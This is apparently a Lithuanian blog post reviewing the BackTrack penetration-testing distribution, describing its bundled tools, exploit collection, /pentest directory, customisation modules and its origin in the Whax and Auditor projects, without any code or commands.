Kam ši distribucija yra skirta? Kaip visuomet tokiais atvejais sakoma, kad tai priemonė skirta saugumo auditoriams. Taip taip. Ėmiau ir patikėjau iš karto. Jei priemonė skirta saugumo auditoriams, tai ji lygiai tiek pat skirta ir įsilaužėliams. Patį CD ar USB variantą galite atsisiųsti iš jų autorių tinklalapio http://www.remote-exploit.org/backtrack.html. Taigi, pasigaminus USB ar įsirašius CD iš karto gausit visą veikiančią operacinę sistemą su daugybe naudojimui beveik paruoštų (gali tekti kartais šiek tiek paderinti tinko nustatymus) programinių priemonių, skirtų įvairių sistemų analizei ir lauž… t.y. saugumo įvertinimui. Visos priemonės yra tvarkingai sugrupuotos atskirais meniu punktais pagal jų paskirtį.

Išsirenkat ko reikia ir naudojat. Jei audito metu prireiks greitai pasileisti apache ar tftpd tarnybas, tai jos naudojimui taip pat jau paruoštos ir tereikia paleisti atitinkamą meniu punktą. Didelių mygtukų maigytojus turiu įspėti, kad dažnai gali nepakakti pasirinkti priemonę, nurodyti sistemą ir paspausti mygtuką su užrašu “Go”. Norint išsiaiškinti ką priemonė daro arba kokia nauda iš jos rezultato, teks ir šiek tiek daugiau pasidomėti.

Be paruoštų naudojimui programinių priemonių čia yra ir visa kolekcija exploit’ų. T.y. nedidelių programėlių išnaudojančių įvairius pažeidžiamumus sistemose. Taip pat dar rasit ir įvairių dokumentų, priemonių programų analizei bei įsilaužimams tirti ir t.t. Visko daug, viskas iš karto įdiegta ir iš karto veikia. Bėda viena - reik mokėti tuo naudotis.

Be šio grafinės aplinkos meniu punkto, reikėtų atkreipti dėmesį ir į katalogą “/pentest”. Jame taip pat rasite daug įvairių priemonių.

Jei čia nerasite Jums reikiamos priemonės, kurią norėtumėte naudoti visą laiką kartu su kitomis, tai tokiu atveju tereikia sukurti savo modulį, kuriuo nesunkiai galėsite papildyti disko atvaizdą, o iš jo pasidaryti naują CD. Naudojantiems USB variantą pakaks reikiamą programą tiesiog įsidiegti.

Tokio tipo distribucijų yra pridaryta ir daugiau, tačiau šią laikau viena geriausių ir lanksčiausių. Taip pat šios distribucijos autoriai yra gyvas pavyzdys kaip reikėtų dirbti open source bendruomenėje. Prieš tai vieni kūrė panašios paskirties distribuciją Whax, o kiti - Auditor Security Collection. Viena distribucija stipresnė buvo vienose srityse, kita - kitose. Bet galiausiai abiejų distribucijų autoriai susijungė ir pradėjo daryti vieną. Produktas gavosi geras ir nemokamas. Vartokite tinkamai.